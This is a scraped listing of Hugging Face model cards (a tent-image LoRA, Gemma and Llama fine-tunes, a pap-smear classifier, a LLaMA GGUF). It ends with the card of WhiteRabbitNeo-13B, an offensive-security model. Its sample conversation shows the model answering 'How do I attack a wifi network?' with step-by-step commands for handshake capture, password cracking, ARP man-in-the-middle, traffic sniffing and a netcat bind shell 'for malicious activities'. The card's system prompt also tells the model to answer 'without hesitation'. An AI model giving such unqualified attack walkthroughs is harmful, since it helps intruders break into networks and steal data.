to the lower rear for better wind resistance. The tent's extended front vestibule
provides sheltered storage space, with the zippered door partially open to
reveal the interior. Multiple guy lines are secured tightly to the ground,
keeping the fabric taut, while arched poles maintain the tent's aerodynamic
shape. The rainfly extends close to the ground for full coverage, and ventilation
flaps at both the front and rear ensure optimal airflow. The surrounding grass
sways gently in the breeze.
output:
url: samples/1728559020993__000003500_4.jpg
base_model: black-forest-labs/FLUX.1-schnell
instance_prompt: Abisko lite 3 tent
license: apache-2.0
---
# abisko_lite_3
Model trained with [AI Toolkit by Ostris](https://github.com/ostris/ai-toolkit)
<Gallery />
## Trigger words
You should use `Abisko lite 3 tent` to trigger the image generation.
## Download model and use it with ComfyUI, AUTOMATIC1111, SD.Next, Invoke AI, etc.
Weights for this model are available in Safetensors format.
[Download](/Kvisten/abisko-lite-3-v1/tree/main) them in the Files & versions tab.
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-schnell', torch_dtype=torch.bfloat16).to('cuda')
pipeline.load_lora_weights('Kvisten/abisko-lite-3-v1', weight_name='abisko_lite_3.safetensors')
image = pipeline('A light blue abisko-lite-3 tent set up on a rocky mountain ridge, surrounded by rugged terrain and distant snow-capped peaks. The tent's guy lines are secured to nearby rocks, and the fabric flutters slightly in the breeze. A few scattered wildflowers can be seen growing between the rocks.').images[0]
image.save("my_image.png")
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
|
kholiavko/test-gemma | kholiavko | 2024-10-10T11:15:10Z | 5 | 0 | transformers | [
"transformers",
"gguf",
"gemma2",
"text-generation-inference",
"unsloth",
"en",
"base_model:unsloth/gemma-2-9b-it-bnb-4bit",
"base_model:quantized:unsloth/gemma-2-9b-it-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T11:09:25Z | ---
base_model: unsloth/gemma-2-9b-it-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- gemma2
- gguf
---
# Uploaded model
- **Developed by:** kholiavko
- **License:** apache-2.0
- **Finetuned from model :** unsloth/gemma-2-9b-it-bnb-4bit
This gemma2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
Ayon128/t5_nmt_bn_en_Eng_Banglish | Ayon128 | 2024-10-10T11:11:44Z | 112 | 0 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"translation",
"generated_from_trainer",
"base_model:csebuetnlp/banglat5_nmt_bn_en",
"base_model:finetune:csebuetnlp/banglat5_nmt_bn_en",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | translation | 2024-10-10T09:43:26Z | ---
library_name: transformers
base_model: csebuetnlp/banglat5_nmt_bn_en
tags:
- translation
- generated_from_trainer
metrics:
- bleu
model-index:
- name: t5_nmt_bn_en_Eng_Banglish
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# t5_nmt_bn_en_Eng_Banglish
This model is a fine-tuned version of [csebuetnlp/banglat5_nmt_bn_en](https://huggingface.co/csebuetnlp/banglat5_nmt_bn_en) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: nan
- Model Preparation Time: 0.0109
- Bleu: 2.7591
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0005
- train_batch_size: 32
- eval_batch_size: 64
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 10
- mixed_precision_training: Native AMP
### Training results
### Framework versions
- Transformers 4.45.1
- Pytorch 2.4.0
- Datasets 3.0.1
- Tokenizers 0.20.0
|
AndyRoberts/dynamic_tinybert-squad | AndyRoberts | 2024-10-10T11:02:54Z | 58 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T10:22:59Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
dioojj99/task-13-google-gemma-2b | dioojj99 | 2024-10-10T10:59:08Z | 6 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:google/gemma-2b",
"base_model:adapter:google/gemma-2b",
"region:us"
] | null | 2024-10-10T09:40:55Z | ---
base_model: google/gemma-2b
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.13.1 |
QuantFactory/llama-7b-GGUF | QuantFactory | 2024-10-10T10:58:06Z | 28 | 1 | null | [
"gguf",
"license:other",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T07:12:50Z |
---
license: other
---
[](https://hf.co/QuantFactory)
# QuantFactory/llama-7b-GGUF
This is quantized version of [huggyllama/llama-7b](https://huggingface.co/huggyllama/llama-7b) created using llama.cpp
# Original Model Card
This contains the weights for the LLaMA-7b model. This model is under a non-commercial license (see the LICENSE file).
You should only use this repository if you have been granted access to the model by filling out [this form](https://docs.google.com/forms/d/e/1FAIpQLSfqNECQnMkycAp2jP4Z9TFX0cGR4uf7b_fBxjY_OjhJILlKGA/viewform?usp=send_form) but either lost your copy of the weights or got some trouble converting them to the Transformers format.
|
vtsrpkn/llama-lexi | vtsrpkn | 2024-10-10T10:48:12Z | 6 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"text-generation-inference",
"unsloth",
"trl",
"sft",
"conversational",
"en",
"base_model:Orenguteng/Llama-3.1-8B-Lexi-Uncensored-V2",
"base_model:finetune:Orenguteng/Llama-3.1-8B-Lexi-Uncensored-V2",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T10:43:55Z | ---
base_model: Orenguteng/Llama-3.1-8B-Lexi-Uncensored-V2
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
- sft
---
# Uploaded model
- **Developed by:** vtsrpkn
- **License:** apache-2.0
- **Finetuned from model :** Orenguteng/Llama-3.1-8B-Lexi-Uncensored-V2
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-103606 | Trelis | 2024-10-10T10:37:58Z | 128 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T10:37:22Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Rafay17/Llama3.2_1b_customModle | Rafay17 | 2024-10-10T10:34:29Z | 14 | 0 | transformers | [
"transformers",
"gguf",
"llama",
"text-generation-inference",
"unsloth",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2024-10-10T10:33:48Z | ---
base_model: unsloth/llama-3.2-1b-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- gguf
---
# Uploaded model
- **Developed by:** Rafay17
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3.2-1b-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
wcosmas/convnext-tiny-224-finetuned-papsmear | wcosmas | 2024-10-10T10:33:15Z | 199 | 0 | transformers | [
"transformers",
"safetensors",
"convnext",
"image-classification",
"generated_from_trainer",
"dataset:imagefolder",
"base_model:facebook/convnext-tiny-224",
"base_model:finetune:facebook/convnext-tiny-224",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | image-classification | 2024-10-10T06:23:13Z | ---
library_name: transformers
license: apache-2.0
base_model: facebook/convnext-tiny-224
tags:
- generated_from_trainer
datasets:
- imagefolder
metrics:
- accuracy
model-index:
- name: convnext-tiny-224-finetuned-papsmear
results:
- task:
name: Image Classification
type: image-classification
dataset:
name: imagefolder
type: imagefolder
config: default
split: train
args: default
metrics:
- name: Accuracy
type: accuracy
value: 0.8897058823529411
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# convnext-tiny-224-finetuned-papsmear
This model is a fine-tuned version of [facebook/convnext-tiny-224](https://huggingface.co/facebook/convnext-tiny-224) on the imagefolder dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2836
- Accuracy: 0.8897
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 128
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 50
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-------:|:----:|:---------------:|:--------:|
| No log | 0.9231 | 9 | 1.7808 | 0.1691 |
| 1.8057 | 1.9487 | 19 | 1.6808 | 0.3309 |
| 1.7394 | 2.9744 | 29 | 1.5825 | 0.3382 |
| 1.6408 | 4.0 | 39 | 1.4576 | 0.375 |
| 1.5428 | 4.9231 | 48 | 1.3281 | 0.5221 |
| 1.3931 | 5.9487 | 58 | 1.2044 | 0.5588 |
| 1.2669 | 6.9744 | 68 | 1.0756 | 0.6103 |
| 1.1355 | 8.0 | 78 | 0.9845 | 0.6324 |
| 1.0379 | 8.9231 | 87 | 0.9260 | 0.6618 |
| 0.9571 | 9.9487 | 97 | 0.8539 | 0.6618 |
| 0.8376 | 10.9744 | 107 | 0.7998 | 0.7279 |
| 0.7942 | 12.0 | 117 | 0.7573 | 0.75 |
| 0.7095 | 12.9231 | 126 | 0.7005 | 0.7426 |
| 0.7022 | 13.9487 | 136 | 0.6834 | 0.7868 |
| 0.6504 | 14.9744 | 146 | 0.6552 | 0.7721 |
| 0.589 | 16.0 | 156 | 0.6192 | 0.8015 |
| 0.5679 | 16.9231 | 165 | 0.5738 | 0.8088 |
| 0.5236 | 17.9487 | 175 | 0.5617 | 0.8015 |
| 0.5244 | 18.9744 | 185 | 0.5073 | 0.8235 |
| 0.4781 | 20.0 | 195 | 0.5112 | 0.8162 |
| 0.453 | 20.9231 | 204 | 0.4650 | 0.8235 |
| 0.4544 | 21.9487 | 214 | 0.4591 | 0.8456 |
| 0.419 | 22.9744 | 224 | 0.4403 | 0.8309 |
| 0.4146 | 24.0 | 234 | 0.4292 | 0.8382 |
| 0.398 | 24.9231 | 243 | 0.4315 | 0.8382 |
| 0.3918 | 25.9487 | 253 | 0.3980 | 0.8676 |
| 0.361 | 26.9744 | 263 | 0.3758 | 0.8603 |
| 0.3355 | 28.0 | 273 | 0.3657 | 0.8603 |
| 0.3483 | 28.9231 | 282 | 0.3669 | 0.875 |
| 0.3171 | 29.9487 | 292 | 0.3492 | 0.8603 |
| 0.3249 | 30.9744 | 302 | 0.3400 | 0.875 |
| 0.3087 | 32.0 | 312 | 0.3251 | 0.875 |
| 0.3029 | 32.9231 | 321 | 0.3167 | 0.8824 |
| 0.3018 | 33.9487 | 331 | 0.3192 | 0.875 |
| 0.2823 | 34.9744 | 341 | 0.3066 | 0.875 |
| 0.2744 | 36.0 | 351 | 0.3003 | 0.875 |
| 0.258 | 36.9231 | 360 | 0.2964 | 0.875 |
| 0.2714 | 37.9487 | 370 | 0.3039 | 0.875 |
| 0.2486 | 38.9744 | 380 | 0.2937 | 0.875 |
| 0.2511 | 40.0 | 390 | 0.2739 | 0.8824 |
| 0.2511 | 40.9231 | 399 | 0.2836 | 0.8897 |
| 0.2659 | 41.9487 | 409 | 0.2804 | 0.875 |
| 0.2379 | 42.9744 | 419 | 0.2747 | 0.8824 |
| 0.2279 | 44.0 | 429 | 0.2726 | 0.8897 |
| 0.2153 | 44.9231 | 438 | 0.2732 | 0.8897 |
| 0.2461 | 45.9487 | 448 | 0.2738 | 0.8897 |
| 0.2482 | 46.1538 | 450 | 0.2738 | 0.8897 |
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
mav23/WhiteRabbitNeo-13B-v1-GGUF | mav23 | 2024-10-10T10:30:26Z | 46 | 0 | null | [
"gguf",
"license:llama2",
"endpoints_compatible",
"region:us"
] | null | 2024-10-10T09:12:20Z | ---
license: llama2
---
# Our 33B model is now in beta!
Access at: https://www.whiterabbitneo.com/
# Our Discord Server
Join us at: https://discord.gg/8Ynkrcbk92 (Updated on Dec 29th. Now permanent link to join)
# LLaMA-2 Licence + WhiteRabbitNeo Extended Version
# Licence: Usage Restrictions
```
You agree not to use the Model or Derivatives of the Model:
- In any way that violates any applicable national or international law or regulation or infringes upon the lawful rights and interests of any third party;
- For military use in any way;
- For the purpose of exploiting, harming or attempting to exploit or harm minors in any way;
- To generate or disseminate verifiably false information and/or content with the purpose of harming others;
- To generate or disseminate inappropriate content subject to applicable regulatory requirements;
- To generate or disseminate personal identifiable information without due authorization or for unreasonable use;
- To defame, disparage or otherwise harass others;
- For fully automated decision making that adversely impacts an individual’s legal rights or otherwise creates or modifies a binding, enforceable obligation;
- For any use intended to or which has the effect of discriminating against or harming individuals or groups based on online or offline social behavior or known or predicted personal or personality characteristics;
- To exploit any of the vulnerabilities of a specific group of persons based on their age, social, physical or mental characteristics, in order to materially distort the behavior of a person pertaining to that group in a manner that causes or is likely to cause that person or another person physical or psychological harm;
- For any use intended to or which has the effect of discriminating against individuals or groups based on legally protected characteristics or categories.
```
# Terms of Use
By accessing and using this Artificial Intelligence (AI) model, you, the user, acknowledge and agree that you are solely responsible for your use of the model and its outcomes. You hereby agree to indemnify, defend, and hold harmless the creators, developers, and any affiliated persons or entities of this AI model from and against any and all claims, liabilities, damages, losses, costs, expenses, fees (including reasonable attorneys' fees and court costs) that may arise, directly or indirectly, from your use of the AI model.
This AI model is provided "as is" and "as available" without any warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and non-infringement. The creators make no warranty that the AI model will meet your requirements or be available on an uninterrupted, secure, or error-free basis.
Your use of the AI model is at your own risk and discretion, and you will be solely responsible for any damage to computer systems or loss of data that results from the use of the AI model.
This disclaimer constitutes part of the agreement between you and the creators of the AI model regarding your use of the model, superseding any prior agreements between you and the creators regarding your use of this AI model.
# WhiteRabbitNeo
<br>

<br>
WhiteRabbitNeo is a model series that can be used for offensive and defensive cybersecurity.
This 13B model is getting released as a public preview of its capabilities, and also to assess the societal impact of such an AI.
```
import torch, json
from transformers import AutoModelForCausalLM, AutoTokenizer
model_path = "/home/migel/models/WhiteRabbitNeo"
model = AutoModelForCausalLM.from_pretrained(
model_path,
torch_dtype=torch.float16,
device_map="auto",
load_in_4bit=False,
load_in_8bit=True,
trust_remote_code=True,
)
tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
def generate_text(instruction):
tokens = tokenizer.encode(instruction)
tokens = torch.LongTensor(tokens).unsqueeze(0)
tokens = tokens.to("cuda")
instance = {
"input_ids": tokens,
"top_p": 1.0,
"temperature": 0.5,
"generate_len": 1024,
"top_k": 50,
}
length = len(tokens[0])
with torch.no_grad():
rest = model.generate(
input_ids=tokens,
max_length=length + instance["generate_len"],
use_cache=True,
do_sample=True,
top_p=instance["top_p"],
temperature=instance["temperature"],
top_k=instance["top_k"],
num_return_sequences=1,
)
output = rest[0][length:]
string = tokenizer.decode(output, skip_special_tokens=True)
answer = string.split("USER:")[0].strip()
return f"{answer}"
tot_system_prompt = """
Answer the Question by exploring multiple reasoning paths as follows:
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.
"""
conversation = f"SYSTEM: {tot_system_prompt} Always answer without hesitation."
while True:
user_input = input("You: ")
llm_prompt = f"{conversation} \nUSER: {user_input} \nASSISTANT: "
answer = generate_text(llm_prompt)
print(answer)
conversation = f"{llm_prompt}{answer}"
# print(conversation)
json_data = {"prompt": user_input, "answer": answer}
# print(json_data)
# with open(output_file_path, "a") as output_file:
# output_file.write(json.dumps(json_data) + "\n")
```
# Sample Conversation:
You: How do I attack a wifi network?
1. **Network Scanning**: Use tools like `airodump-ng` to scan for nearby Wi-Fi networks. This will provide you with the SSID (Service Set Identifier) of the network
you're interested in.
```bash
airodump-ng wlan0mon
```
2. **Network Capturing**: Once you have identified the target network, you can capture packets from it using the `airodump-ng` tool. This will allow you to capture handshake packets which are necessary for further attacks.
```bash
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
```
3. **Handshake Capture**: Wait for a client to connect to the network and capture the 4-way handshake. This will allow you to crack the network's password using tools like `aircrack-ng`.
```bash
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
```
4. **Password Cracking**: Once you have the handshake, use `aircrack-ng` to crack the password.
```bash
aircrack-ng [Captured Handshake File]
```
5. **Session Establishment**: If you have the password, you can connect to the network using your wireless card.
```bash
iwconfig wlan0 essid [Network SSID] key [Network Password]
dhclient wlan0
```
6. **Network Exploitation**: Once connected, you can perform further attacks, such as sniffing traffic (`tcpdump`), or launching a man-in-the-middle attack using tools like `ettercap` or `arpspoof`.
```bash
tcpdump -i wlan0 -w [Packet Capture File]
ettercap -T -i [Interface] -M arp [Target IP]
```
7. **Post-Exploitation**: After gaining access to the network, you can exfiltrate data, execute commands, or perform other malicious activities.
```bash
nc -lvp [Local Port] -e /bin/bash
```
